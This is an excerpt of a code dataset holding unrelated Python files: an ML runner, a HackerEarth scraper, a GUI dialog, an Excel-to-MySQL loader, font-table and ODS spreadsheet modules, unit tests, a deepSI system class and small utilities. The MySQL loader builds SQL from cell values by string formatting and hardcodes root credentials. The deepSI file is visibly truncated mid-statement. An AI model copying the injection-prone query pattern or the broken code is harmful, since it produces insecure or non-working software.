sum(vectors[base.name], SparseVector()) for base in s.experimentBase}\n\n for base in s.experimentBase:\n masterTermVectorsWithPos[base.name] = OrderedDict(\n {term: position for position, term in enumerate(sorted(masterTermVectors[base.name].keys()), 0)})\n with open(Path(b.path, 
\"MasterTermVectorWithPos\" + base.name).with_suffix(\".json\"), \"w\") as f:\n f.write(jdumps(masterTermVectorsWithPos[base.name]))\n with open(Path(b.path, \"MasterTermVector\" + base.name).with_suffix(\".json\"), \"w\") as f:\n f.write(jdumps(masterTermVectors[base.name].data()))\n\n for i, modelTemplate in enumerate(ModelTemplates, 0):\n for base in s.experimentBase:\n modelTemplate.train(masterTermVectorsWithPos[base.name], base)\n modelTemplate.saveLinks(base)\n\n copy_tree('resources/trainingData', str(Path(b.path) / 'trainingData'))\n else:\n logger.info('Skipping model training phase')\n\n if s.load:\n logger.info('Loading resources from previous phases/runs')\n for base in s.experimentBase:\n for i, modelTemplate in enumerate(ModelTemplates, 0):\n modelTemplate.loadModels(base)\n modelTemplate.loadLinks(base)\n with open(Path(b.path, \"MasterTermVectorWithPos\" + base.name).with_suffix(\".json\")) as f:\n masterTermVectorsWithPos[base.name] = jload(f)\n logger.info(f\"Master term vector {base.name} has been loaded\")\n\n if s.classify:\n logger.info(s.classifierWeights)\n sti = STIClassifier(s.dbpediaFullClassHiearchy, s.stiDebug)\n classifierAggregator = ClassifierAggregator(sti, ModelTemplates, masterTermVectorsWithPos, s.lhdDataset,\n s.classifierWeights, s.thresholdingStrategy, \"Full\", s.threshold, s.finalTypeSelectionStrategy)\n classifierAggregator.processResources(s.toClassify1, s.resultFile1)\n classifierAggregator.processResources(s.toClassify2, s.resultFile2)\n classifierAggregator.processResources(s.toClassify3, s.resultFile3)\n # cProfile.run('classifierAggregator.processResources(s.toClassify2, s.resultFile2)')\n\n if s.evaluate:\n results = {}\n evaluator = HiearchicalEvaluator(str(s.dbpeadiaBase))\n results[str(s.toClassify1)] = evaluator.perform_eval(s.resultFile1, s.toClassify1)\n results[str(s.toClassify2)] = evaluator.perform_eval(s.resultFile2, s.toClassify2)\n results[str(s.toClassify3)] = evaluator.perform_eval(s.resultFile3, s.toClassify3)\n\n logger.info(results)\n with open(Path(b.path, \"results\").with_suffix(\".json\"), \"w\") as f:\n f.write(jdumps(results))\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"runner.py","file_name":"runner.py","file_ext":"py","file_size_in_byte":6027,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"612839183","text":"import dryscrape\nfrom bs4 import BeautifulSoup\nimport webbrowser\nname=input('Enter name : ')\nfile_name=name+'.txt'\nfw=open(file_name,'r')\nst=str(fw.read())\nfw.close()\nfirstHref=st\nprint('first href is '+firstHref)\nurl_name=''\nif(name=='Ankit_singh'):\n url_name='akt_rabbit'\nelse:\n url_name='abisbaba1'\nurl='https://www.hackerearth.com/submissions/'+url_name+'/'\nses=dryscrape.Session()\nses.visit(url)\nr=ses.body()\nsoup=BeautifulSoup(r,'html.parser')\nlink = soup.find_all('a' , class_='no-color hover-link')\nl=0;\nfor x in link:\n if(firstHref.find(x['href'])!=-1):\n break\n l+=1;\n\nif(l==0):\n print('No recent submission')\nelse:\n print('Total problem solved '+str(l))\n fw=open(file_name,'w')\n fw.write(link[0]['href'])\n fw.close()\n print('Enter YES to open all the question : ')\n whatDO = input()\n if (whatDO == 'YES'):\n km = 0\n base_url = 'https://www.hackerearth.com'\n for x in link:\n if (km == l):\n break;\n url = base_url + x['href']\n webbrowser.open(url)\n km += 
1\n","sub_path":"Friends-submission.py","file_name":"Friends-submission.py","file_ext":"py","file_size_in_byte":1087,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"}
+{"seq_id":"68426384","text":"#\n# Python GUI - Dialogs - Generic\n#\n\nfrom GUI import Globals\nfrom GUI.Properties import overridable_property\nfrom GUI.Actions import ActionBase, action_property\nfrom GUI import Window\n\nclass Dialog(Window, ActionBase):\n\n\t_default_keys = \"\\r\"\n\t_cancel_keys = \"\\x1b\"\n\n\tdefault_button = overridable_property('default_button',\n\t\t\"Button to be activated by the default key.\")\n\t\n\tcancel_button = overridable_property('cancel_button',\n\t\t\"Button to be activated by the cancel key.\")\n\t\n\t_default_button = None\n\t_cancel_button = None\n\n\tdefault_action = action_property('default_action',\n\t\t\"Action to perform when Return or Enter is pressed.\")\n\t\n\tcancel_action = action_property('cancel_action',\n\t\t\"Action to perform when Escape is pressed.\")\n\t\n\t_default_action = 'ok'\n\t_cancel_action ='cancel'\n\n\tdef __init__(self, style = 'nonmodal_dialog', \n\t\t\tclosable = 0, zoomable = 0, resizable = 0, **kwds):\n\t\tif 'title' not in kwds:\n\t\t\tkwds['title'] = Globals.application_name\n\t\tWindow.__init__(self, style = style, \n\t\t\tclosable = closable, zoomable = zoomable, resizable = resizable,\n\t\t\t**kwds)\n\t\n\tdef get_default_button(self):\n\t\treturn self._default_button\n\t\n\tdef set_default_button(self, button):\n\t\tself._default_button = button\n\t\tif button:\n\t\t\tbutton.style = 'default'\n\t\t\tif not button.action:\n\t\t\t\tbutton.action = 'do_default_action'\n\t\n\tdef get_cancel_button(self):\n\t\treturn self._cancel_button\n\t\n\tdef set_cancel_button(self, button):\n\t\tself._cancel_button = button\n\t\tif button:\n\t\t\tbutton.style = 'cancel'\n\t\t\tif not button.action:\n\t\t\t\tbutton.action = 'do_cancel_action'\n\n\tdef key_down(self, event):\n\t\t#print \"GDialog.key_down:\", repr(event.char) ###\n\t\tc = event.char\n\t\tif c:\n\t\t\tif c in self._default_keys:\n\t\t\t\tself._activate_button(self.default_button) or self.do_default_action()\n\t\t\t\treturn\n\t\t\telif c in self._cancel_keys:\n\t\t\t\tself._activate_button(self.cancel_button) or self.do_cancel_action()\n\t\t\t\treturn\n\t\tWindow.key_down(self, event)\n\n\tdef do_default_action(self):\n\t\tself.do_named_action('default_action')\n\n\tdef do_cancel_action(self):\n\t\tself.do_named_action('cancel_action')\n\n\tdef _activate_button(self, button):\n\t\t#print(\"GDialog._activate_button:\", button)\n\t\tif button:\n\t\t\tbutton.activate()\n\t\t\treturn True\n\t\telse:\n\t\t\treturn False\n","sub_path":"GUI/Generic/GDialogs.py","file_name":"GDialogs.py","file_ext":"py","file_size_in_byte":2229,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"}
+{"seq_id":"577236091","text":"# -*- coding:utf-8 -*-\n# Read Excel data and insert into MySQL. Known issue: inserted Chinese text comes out garbled.\nimport pandas as pd\nfrom MysqlHelper import MysqlHelper\n\n\nsqlhelper = MysqlHelper('127.0.0.1', 3306, 'test', 'root', '1234')\ndf = pd.read_excel('D:\\\\work\\\\isoftstone\\\\pandastest\\\\test02.xlsx',sheet_name='Sheet1')\n\n# print df\n\nfor index, row in df.iterrows():\n # print row\n # print row['name'], row['age'], row['class']\n # sql = \"INSERT INTO stu01(name,age,class) VALUES(%s,%s,%s)\".format(row['name'],row['age'],row['class'])\n # sql = \"INSERT INTO stu01(name,age,class) VALUES(%s,%s,%s)\".format(row['name'],row['age'],row['class'])\n # sql = \"INSERT INTO stu01(name,age,class) VALUES('{name}','{age}','{clazz}')\".format(name='12',age=25,clazz='36')\n # TODO: unresolved - inserted Chinese text comes out garbled\n sql = \"INSERT INTO stu01(name,age,class) VALUES('{name}','{age}','{clazz}')\".format(name=row['name'],age=row['age'],clazz=row['class'])\n\n sqlhelper.insert(sql)\n\n# params=['1',2,'3']\n# sql=\"INSERT INTO stu01(name,age,class) VALUES(%s,%s,%s)\"\n\n\n\n\n\n\n\n\n\n","sub_path":"pandas/pandastest08.py","file_name":"pandastest08.py","file_ext":"py","file_size_in_byte":1053,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"}
+{"seq_id":"76922163","text":"#\n# MTet.py\n#\n# Copyright © 2007-2008, 2010, 2013 Monotype Imaging Inc. All Rights Reserved.\n#\n\n\"\"\"\nDefinitions relating to the entire MTet table, which has information on times\neach glyph in a font was last edited.\n\"\"\"\n\n# System imports\nimport datetime\n\n# Other imports\nfrom fontio3.fontdata import mapmeta\n\n# -----------------------------------------------------------------------------\n\n#\n# Classes\n#\n\nclass MTet(dict, metaclass=mapmeta.FontDataMetaclass):\n \"\"\"\n Objects representing entire 'MTet' tables. These are dicts whose keys are\n glyph indices and whose values are integers representing the number of\n seconds elapsed since midnight, January 1, 1904.\n \n >>> _testingValues[1].pprint()\n 0: 2015-11-25 04:09:04\n 1: 2015-11-25 09:42:24\n 2: 2015-11-24 00:22:24\n 3: 2015-11-25 04:09:04\n \n >>> _testingValues[1].pprint(namer=namer.testingNamer())\n xyz1: 2015-11-25 04:09:04\n xyz2: 2015-11-25 09:42:24\n xyz3: 2015-11-24 00:22:24\n xyz4: 2015-11-25 04:09:04\n \"\"\"\n \n #\n # Class definition variables\n #\n \n def _pf(p, n, label, **kwArgs):\n dBase = datetime.datetime(1904, 1, 1)\n p.simple(str(dBase + datetime.timedelta(seconds=n)), label=label)\n \n mapSpec = dict(\n item_pprintfunc = _pf,\n item_renumberdirectkeys = True,\n item_usenamerforstr = True)\n \n del _pf\n \n #\n # Class methods\n #\n \n @classmethod\n def fromwalker(cls, w, **kwArgs):\n \"\"\"\n Creates and returns a MTet object from the specified walker.\n \n >>> d = {'fontGlyphCount': 4}\n >>> _testingValues[1] == MTet.frombytes(_testingValues[1].binaryString(), **d)\n True\n \n >>> _testingValues[0] == MTet.frombytes(_testingValues[0].binaryString(), **d)\n Traceback (most recent call last):\n ...\n ValueError: 'MTet' entry count (0) does not match font glyph count (4)\n \"\"\"\n \n version = w.unpack(\"L\")\n \n if version != 0x10000:\n raise ValueError(\"Unknown 'MTet' version: 0x%08X\" % (version,))\n \n fgc = kwArgs['fontGlyphCount']\n t = w.unpackRest(\"L\")\n \n if len(t) != fgc:\n s = \"'MTet' entry count (%d) does not match font glyph count (%d)\"\n raise ValueError(s % (len(t), fgc))\n \n return cls(zip(range(fgc), t))\n \n #\n # Public methods\n #\n \n def buildBinary(self, w, **kwArgs):\n \"\"\"\n Adds the binary data for the MTet object to the specified LinkedWriter.\n \n >>> utilities.hexdump(_testingValues[1].binaryString())\n 0 | 0001 0000 D27A E4E0 D27B 3300 D279 5E40 |.....z...{3..y^@|\n 10 | D27A E4E0 |.z.. 
|\n \"\"\"\n \n count = len(self)\n \n if set(self) != set(range(count)):\n raise ValueError(\"MTet keys are not dense!\")\n \n if 'stakeValue' in kwArgs:\n stakeValue = kwArgs.pop('stakeValue')\n w.stakeCurrentWithValue(stakeValue)\n else:\n stakeValue = w.stakeCurrent()\n \n w.add(\"L\", 0x10000) # version\n w.addGroup(\"L\", (self[i] for i in range(count)))\n \n def setToNow(self, iterable):\n \"\"\"\n Sets the timestamp for all glyph indices in iterable to now.\n \n >>> d = _testingValues[1].__copy__()\n >>> d[0] == d[2], d[0] == _testingValues[1][0], d[2] == _testingValues[1][2]\n (False, True, True)\n >>> d.setToNow([0, 2])\n >>> d[0] == d[2], d[0] == _testingValues[1][0], d[2] == _testingValues[1][2]\n (True, False, False)\n \"\"\"\n \n nowDelta = datetime.datetime.now() - datetime.datetime(1904, 1, 1)\n now = nowDelta.days * 86400 + nowDelta.seconds\n \n for glyphIndex in iterable:\n self[glyphIndex] = now\n\n# -----------------------------------------------------------------------------\n\n#\n# Test code\n#\n\nif 0:\n def __________________(): pass\n\nif __debug__:\n from fontio3 import utilities\n from fontio3.utilities import namer\n \n _testingValues = (\n MTet(),\n MTet({0: 3531269344, 1: 3531289344, 2: 3531169344, 3: 3531269344}))\n\ndef _test():\n import doctest\n doctest.testmod()\n\nif __name__ == \"__main__\":\n if __debug__:\n _test()\n","sub_path":"fontio3/build/lib.linux-x86_64-3.6/fontio3/MTet.py","file_name":"MTet.py","file_ext":"py","file_size_in_byte":4385,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"568229376","text":"\"\"\"\n pyexcel_ods3.ods\n ~~~~~~~~~~~~~~~~~~~\n\n ODS format plugin for pyexcel\n\n :copyright: (c) 2015-2016 by Onni Software Ltd. & its contributors\n :license: New BSD License\n\"\"\"\nimport sys\nimport math\nimport datetime\nimport ezodf\n\nfrom pyexcel_io.book import BookReader, BookWriter\nfrom pyexcel_io.sheet import SheetReader, SheetWriter\n\nPY2 = sys.version_info[0] == 2\nif PY2 and sys.version_info[1] < 7:\n from ordereddict import OrderedDict\nelse:\n from collections import OrderedDict\n\n\ndef is_integer_ok_for_xl_float(value):\n if value == math.floor(value):\n return True\n else:\n return False\n\n\ndef float_value(value):\n ret = float(value)\n return ret\n\n\ndef date_value(value):\n ret = \"invalid\"\n try:\n # catch strptime exceptions only\n if len(value) == 10:\n ret = datetime.datetime.strptime(\n value,\n \"%Y-%m-%d\")\n ret = ret.date()\n elif len(value) == 19:\n ret = datetime.datetime.strptime(\n value,\n \"%Y-%m-%dT%H:%M:%S\")\n elif len(value) > 19:\n ret = datetime.datetime.strptime(\n value[0:26],\n \"%Y-%m-%dT%H:%M:%S.%f\")\n except:\n pass\n if ret == \"invalid\":\n raise Exception(\"Bad date value %s\" % value)\n return ret\n\n\ndef time_value(value):\n hour = int(value[2:4])\n minute = int(value[5:7])\n second = int(value[8:10])\n if hour < 24:\n return datetime.time(hour, minute, second)\n else:\n return datetime.timedelta(hours=hour, minutes=minute, seconds=second)\n\n\n\ndef boolean_value(value):\n return value\n\n\nODS_FORMAT_CONVERSION = {\n \"float\": float,\n \"date\": datetime.date,\n \"time\": datetime.time,\n \"boolean\": bool,\n \"percentage\": float,\n \"currency\": float\n}\n\n\nODS_WRITE_FORMAT_COVERSION = {\n float: \"float\",\n int: \"float\",\n str: \"string\",\n datetime.date: \"date\",\n datetime.time: \"time\",\n datetime.timedelta: \"timedelta\",\n bool: \"boolean\"\n}\n\n\nVALUE_CONVERTERS = {\n \"float\": float_value,\n \"date\": 
date_value,\n \"time\": time_value,\n \"boolean\": boolean_value,\n \"percentage\": float_value,\n \"currency\": float_value\n}\n\n\nVALUE_TOKEN = {\n \"float\": \"value\",\n \"date\": \"date-value\",\n \"time\": \"time-value\",\n \"boolean\": \"boolean-value\",\n \"percentage\": \"value\",\n \"currency\": \"value\"\n}\n\n\nif sys.version_info[0] < 3:\n ODS_WRITE_FORMAT_COVERSION[unicode] = \"string\"\n\n\nclass ODSSheet(SheetReader):\n def __init__(self, sheet, auto_detect_int=True, **keywords):\n SheetReader.__init__(self, sheet, **keywords)\n self.auto_detect_int = auto_detect_int\n\n @property\n def name(self):\n return self.native_sheet.name\n\n def to_array(self):\n \"\"\"reads a sheet in the sheet dictionary, storing each sheet\n as an array (rows) of arrays (columns)\"\"\"\n for row in range(self.native_sheet.nrows()):\n row_data = []\n tmp_row = []\n for cell in self.native_sheet.row(row):\n cell_value = self._read_cell(cell)\n tmp_row.append(cell_value)\n if cell_value is not None and cell_value != '':\n row_data += tmp_row\n tmp_row = []\n if len(row_data) > 0:\n yield row_data\n\n def _read_cell(self, cell):\n cell_type = cell.value_type\n ret = None\n if cell_type in ODS_FORMAT_CONVERSION:\n value = cell.value\n n_value = VALUE_CONVERTERS[cell_type](value)\n if cell_type == 'float' and self.auto_detect_int:\n if is_integer_ok_for_xl_float(n_value):\n n_value = int(n_value)\n ret = n_value\n else:\n if cell.value is None:\n ret = \"\"\n else:\n ret = cell.value\n return ret\n\n\n\nclass ODSBook(BookReader):\n\n def __init__(self):\n BookReader.__init__(self)\n self.native_book = None\n\n def open(self, file_name, **keywords):\n BookReader.open(self, file_name, **keywords)\n self._load_from_file()\n\n def open_stream(self, file_stream, **keywords):\n BookReader.open_stream(self, file_stream, **keywords)\n self._load_from_memory()\n\n def read_sheet_by_name(self, sheet_name):\n rets = [sheet for sheet in self.native_book.sheets if sheet.name == sheet_name]\n if len(rets) == 0:\n raise ValueError(\"%s cannot be found\" % sheet_name)\n elif len(rets) == 1:\n return self._read_sheet(rets[0])\n else:\n raise ValueError(\n \"More than 1 sheet named as %s are found\" % sheet_name)\n pass\n\n def read_sheet_by_index(self, sheet_index):\n sheets = self.native_book.sheets\n length = len(sheets)\n if sheet_index < length:\n return self._read_sheet(sheets[sheet_index])\n else:\n raise IndexError(\"Index %d of out bound %d.\" % (sheet_index,\n length))\n\n def read_all(self):\n result = OrderedDict()\n for sheet in self.native_book.sheets:\n ods_sheet = ODSSheet(sheet, **self.keywords)\n result[ods_sheet.name] = ods_sheet.to_array()\n return result\n\n def _read_sheet(self, native_sheet):\n sheet = ODSSheet(native_sheet, **self.keywords)\n return {native_sheet.name: sheet.to_array()}\n\n\n def _load_from_file(self):\n self.native_book = ezodf.opendoc(self.file_name)\n\n def _load_from_memory(self):\n self.native_book = ezodf.opendoc(self.file_stream)\n\n\nclass ODSSheetWriter(SheetWriter):\n \"\"\"\n ODS sheet writer\n \"\"\"\n def set_sheet_name(self, name):\n self.native_sheet = ezodf.Sheet(name)\n self.current_row = 0\n\n def set_size(self, size):\n self.native_sheet.reset(size=size)\n\n def write_row(self, array):\n \"\"\"\n write a row into the file\n \"\"\"\n count = 0\n for cell in array:\n value_type = ODS_WRITE_FORMAT_COVERSION[type(cell)]\n if value_type == \"time\":\n cell = cell.strftime(\"PT%HH%MM%SS\")\n elif value_type == \"timedelta\":\n hours = cell.days * 24 + cell.seconds 
// 3600\n minutes = (cell.seconds // 60) % 60\n seconds = cell.seconds % 60\n cell = \"PT%02dH%02dM%02dS\" % (hours, minutes, seconds)\n value_type = \"time\"\n self.native_sheet[self.current_row, count].set_value(\n cell,\n value_type=value_type)\n count += 1\n self.current_row += 1\n\n def close(self):\n \"\"\"\n This call writes file\n\n \"\"\"\n self.native_book.sheets += self.native_sheet\n\n\nclass ODSWriter(BookWriter):\n \"\"\"\n open document spreadsheet writer\n\n \"\"\"\n def __init__(self):\n BookWriter.__init__(self)\n self.native_book = None\n\n def open(self, file_name, **keywords):\n BookWriter.open(self, file_name, **keywords)\n self.native_book = ezodf.newdoc(doctype=\"ods\", filename=self.file_alike_object)\n\n skip_backup_flag = self.keywords.get('skip_backup', True)\n if skip_backup_flag:\n self.native_book.backup = False\n\n def create_sheet(self, name):\n \"\"\"\n write a row into the file\n \"\"\"\n return ODSSheetWriter(self.native_book, None, name)\n\n def close(self):\n \"\"\"\n This call writes file\n\n \"\"\"\n self.native_book.save()\n\n\n_ods_registry = {\n \"file_type\": \"ods\",\n \"reader\": ODSBook,\n \"writer\": ODSWriter,\n \"stream_type\": \"binary\",\n \"mime_type\": \"application/vnd.oasis.opendocument.spreadsheet\",\n \"library\": \"ezodf\"\n}\n\nexports = (_ods_registry, )\n","sub_path":"pyexcel_ods3/ods.py","file_name":"ods.py","file_ext":"py","file_size_in_byte":7834,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"593448583","text":"# run python -m unittest tests.test_classes on parent directory\n\nimport unittest\nfrom classes import FamilyPromotion, Group, Bike, Period, Rent\n\n\nbikes = []\nperiods = []\n\ndef setUpModule():\n for bike in range(1,8):\n bikes.append(Bike(1,True))\n for period in ((\"A\",2), (\"B\",4), (\"C\",8)):\n periods.append(Period(period[0],period[1]))\n\n\ndef tearDownModule():\n pass\n\n\nclass TestGroup(unittest.TestCase):\n\n def test_calculate_price_1(self):\n rents = [Rent(bikes[0],periods[0]),\n Rent(bikes[1],periods[0])]\n group = Group(rents)\n group.calculate_price()\n self.assertEqual(4, group.subtotal)\n \n\n def test_calculate_price_2(self):\n rents = [Rent(bikes[0],periods[2])]\n group = Group(rents)\n group.calculate_price()\n self.assertEqual(8, group.subtotal)\n\n\n\nclass TestFamilyPromotion(unittest.TestCase):\n\n def test_calculate_price(self):\n rents = [Rent(bikes[0],periods[0]),\n Rent(bikes[1],periods[2])]\n group = Group(rents)\n family_promotion = FamilyPromotion(group)\n family_promotion.calculate_price()\n self.assertEqual(7, group.subtotal)\n \n\n def test_is_eligible_1(self):\n rents = []\n for n in range(2):\n rents.append(Rent(bikes[n], periods[0]))\n\n group = Group(rents)\n family_promotion = FamilyPromotion(group)\n self.assertEqual(False, family_promotion.is_eligible())\n \n\n\n def test_is_eligible_2(self):\n rents = []\n for n in range(4):\n rents.append(Rent(bikes[n], periods[0]))\n group = Group(rents)\n family_promotion = FamilyPromotion(group)\n self.assertEqual(True, family_promotion.is_eligible())\n\n\n def test_is_eligible_3(self):\n rents = []\n for n in range(6):\n rents.append(Rent(bikes[n], periods[0]))\n group = Group(rents)\n family_promotion = FamilyPromotion(group)\n self.assertEqual(False, family_promotion.is_eligible())\n \n\n\nif __name__ == '__main__':\n 
unittest.main()\n","sub_path":"tests/test_classes.py","file_name":"test_classes.py","file_ext":"py","file_size_in_byte":2101,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"}
+{"seq_id":"254713801","text":"from deepSI.system_data import System_data, System_data_list, System_data_norm\nimport deepSI\nimport numpy as np\nimport pickle\nfrom secrets import token_urlsafe\nimport copy\nimport gym\nfrom gym.spaces import Box\nfrom matplotlib import pyplot as plt\n\ndef load_system(file):\n    \"\"\"This is not a safe function, only use on trusted files\"\"\"\n    try:\n        return pickle.load(open(file,'rb'))\n    except (pickle.UnpicklingError, EOFError): #maybe it was saved using torch systems\n        import torch\n        return torch.load(file)\n\n\nclass System(object):\n    '''The base System class\n\n    Attributes\n    ----------\n    action_space : gym.space or None\n        the input shape of input u. (None is a single unbounded float)\n    observation_space : gym.space or None\n        The input shape of output y. (None is a single unbounded float)\n    norm : instance of System_data_norm\n        Used in most fittable systems to normalize the input output.\n    fitted : bool\n    unique_code : str\n        Some random unique 4 digit code (can be used for saving/loading)\n    name : str\n        concatenation of the class name and the unique code\n    use_norm : bool\n    seed : int\n        random seed\n    random : np.random.RandomState\n        unique random generator initialized with seed (only created once called)\n    '''\n    def __init__(self, action_space=None, observation_space=None):\n        '''Create a System\n\n        Parameters\n        ----------\n        action_space : gym.space or None\n            the input shape of input u. (None is a single unbounded float)\n        observation_space : gym.space or None\n            The input shape of output y. (None is a single unbounded float)\n        '''\n        self.action_space, self.observation_space = action_space, observation_space\n        self.norm = System_data_norm()\n        self.fitted = False\n        self.unique_code = token_urlsafe(4).replace('_','0').replace('-','a') #random code\n        self.seed = 42\n        self.use_norm = True #can be changed later\n        self._dt = None\n\n    @property\n    def name(self):\n        return self.__class__.__name__ + '_' + self.unique_code\n    @property\n    def random(self): #gets created once called, this is to make pickle more stable between different versions of numpy\n        if not hasattr(self,'_random'):\n            self._random = np.random.RandomState(seed=self.seed)\n        return self._random\n    def get_state(self):\n        '''state of the system (not the parameters)\n\n        Returns\n        -------\n        state : the user defined state\n        '''\n        import warnings\n        warnings.warn('Calling sys.state but no state has been set')\n        return None\n\n    def apply_experiment(self, sys_data, save_state=False): #can put this in apply controller\n        '''Does an experiment for a given system data (fixed u)\n\n        Parameters\n        ----------\n        sys_data : System_data or System_data_list (or list or tuple)\n            The experiment which should be applied\n\n        Notes\n        -----\n        This will initialize the state using self.init_state if sys_data.y (and u)\n        is not None and skip the appropriate number of steps associated with it.
\n Afterwards this state is advanced using sys_data.u and the output is saved at each step.\n Lastly, the number of skipped/copied steps in init_state is saved as sys_data.cheat_n such \n that it can be accounted for later.\n '''\n\n if isinstance(sys_data,(tuple,list,System_data_list)):\n return System_data_list([self.apply_experiment(sd, save_state=save_state) for sd in sys_data])\n Y = []\n sys_data_norm = self.norm.transform(sys_data) #do this correctly\n \n dt_old = self.dt\n self.dt = sys_data.dt #calls the setter\n\n U = sys_data_norm.u\n if sys_data_norm.y is not None: #if y is not None than init state\n obs, k0 = self.init_state(sys_data_norm) #is reset if init_state is not defined #normed obs\n Y.extend(sys_data_norm.y[:k0]) #h(x_{k0-1})\n else:\n obs, k0 = self.reset(), 0\n\n if save_state:\n X = [self.get_state()]*(k0+1)\n\n for k in range(k0,len(U)):\n Y.append(obs) \n if k0)*2-1] for i in range(500)]) #mountain car solve\n # print(sys)\n # exp = System_data(u=[sys.action_space.sample() for i in range(500)]) \n # print(exp.u.dtype)\n # sys_data =sys.apply_experiment(exp)\n # print(sys_data)\n # sys_data.plot(show=True)\n\n # sys = deepSI.systems.Nonlin_io_normals()\n # exp = System_data(u=np.random.normal(scale=2,size=100))\n # print(sys.step(1))\n # sys_data = sys.apply_experiment(exp)\n # # sys_data.plot(show=True)\n # sys = deepSI.systems.SS_test()\n # sys_data = sys.apply_experiment(exp)\n # sys_data.plot()\n\n # sys.save_system('../../testing/test.p')\n # del sys\n # sys = load_system('../../testing/test.p')\n\n # sys_data = sys.apply_experiment(exp)\n # sys_data.plot(show=True)\n\n #deriv testing\n # class barrier(System_deriv):\n # \"\"\"docstring for barrier\"\"\"\n # def __init__(self, method='RK4'):\n # super(barrier, self).__init__(nx=2,dt=0.1,method=method)\n \n # def deriv(self,x,u):\n # x,vx = x\n # dxdt = vx\n # alpha = 0.01\n # dvxdt = - 1e-3*vx + alpha*( - 1/(x-1)**2 + 1/(x+1)**2) + u\n # return [dxdt,dvxdt]\n\n # def h(self,x):\n # return x[0]\n\n # np.random.seed(32)\n # sys = barrier(method='RK45')\n # exp = deepSI.System_data(u=np.random.uniform(-1,1,size=500))\n # d = sys.apply_experiment(exp)\n # d.plot(show=True)\n","sub_path":"deepSI/systems/system.py","file_name":"system.py","file_ext":"py","file_size_in_byte":27485,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"183052036","text":"from math import *\n\ndef koordinate(ime,kraji):\n s = ()\n for kraj,x1,y1 in kraji:\n if ime == kraj:\n s += x1,y1\n if s == ():\n s = None\n return(s)\n\ndef razdalja_koordinat(x1, y1, x2, y2):\n return(sqrt((x1 - x2) ** 2 + (y1 - y2) ** 2))\n\ndef razdalja(ime1, ime2, kraji):\n s1 = koordinate(ime1,kraji)\n s2 = koordinate(ime2,kraji)\n r = razdalja_koordinat(s1[0],s1[1],s2[0],s2[1])\n return(r)\n\ndef v_dometu(ime, domet, kraji):\n\n s = []\n for kraj in kraji:\n r = razdalja(ime, kraj[0], kraji)\n if r > 0.0:\n if r <= domet:\n s.append(kraj[0])\n return s\n\ndef najbolj_oddaljeni(ime, imena, kraji):\n naj_razdalja = 0\n naj_kraj = None\n for ime2 in imena:\n if razdalja(ime,ime2,kraji) >= naj_razdalja:\n naj_razdalja = razdalja(ime,ime2,kraji)\n naj_kraj = ime2\n return naj_kraj\n\ndef zalijemo(ime, domet, kraji):\n return(najbolj_oddaljeni(ime,v_dometu(ime,domet,kraji),kraji))\n\n","sub_path":"code/batch-1/vse-naloge-brez-testov/DN4-M-176.py","file_name":"DN4-M-176.py","file_ext":"py","file_size_in_byte":1004,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} 
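[Editor's note] The DN4-M-176.py record above builds `zalijemo` from three helpers: a coordinate lookup (`koordinate`), a Euclidean distance (`razdalja_koordinat`/`razdalja`), and a range filter (`v_dometu`) whose result feeds a farthest-point search. Below is a minimal standalone sketch of the same farthest-point-within-range idea, assuming Python 3.8+ for `math.dist`; the `places` dict and its entries are hypothetical stand-ins for the record's list of (name, x, y) tuples, not part of the original code.

    from math import dist  # Euclidean distance, Python 3.8+

    places = {"home": (0.0, 0.0), "well": (3.0, 4.0), "field": (6.0, 8.0)}  # hypothetical data

    def farthest_within_range(name, radius, places):
        # Of the other places within `radius` of `name`, return the farthest; None if none qualify.
        origin = places[name]
        reachable = [(dist(origin, p), other)
                     for other, p in places.items()
                     if other != name and dist(origin, p) <= radius]
        return max(reachable)[1] if reachable else None

    # e.g. farthest_within_range("home", 6.0, places) -> "well" (distance 5.0; "field" at 10.0 is out of range)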
+{"seq_id":"427845132","text":"'''\nCreated on Nov 8, 2015\n\n@author: zhuoli\n'''\nimport datetime\nimport os\n\nimport Constant\n\n\nLOG_PATH = Constant.DATA_ROOT + \"/Coin.log\"\ndef AssertEqual(a, b):\n    if a != b:\n        raise Exception('Not equal');\n\ndef Log(message):\n    if not os.path.exists(Constant.DATA_ROOT):\n        os.makedirs(Constant.DATA_ROOT)\n    time = str(datetime.datetime.now())\n    secondIndex = time.rfind(':')\n    time = time[:secondIndex]\n    with open(LOG_PATH, \"a\") as log:\n        log.write(time + ' : \"' + message + '\"\\n')","sub_path":"source/Errors.py","file_name":"Errors.py","file_ext":"py","file_size_in_byte":510,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"}
+{"seq_id":"297638371","text":"'''\r\nPython Code Snippets #22\r\n109-Validate email address\r\n\r\nTested on Python V3.6x, Window 7\r\n\r\npip3 install lepl\r\n\r\nsource:\r\nhttp://code.activestate.com/recipes/\r\n65215-e-mail-address-validation/?in=user-114221\r\n'''\r\nfrom lepl.apps.rfc3696 import Email\r\n#Email function does not take an argument, it is just a validator\r\n\r\nt1 = Email()\r\n\r\nif t1('bollo@tesco.co.uk'):\r\n    print(\"Looks like a valid Email address\")\r\nelse:\r\n    print(\"Appears to be an invalid Email address\")\r\n","sub_path":"Python-code-snippets-101-200/109-validate email address.py","file_name":"109-validate email address.py","file_ext":"py","file_size_in_byte":477,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"}
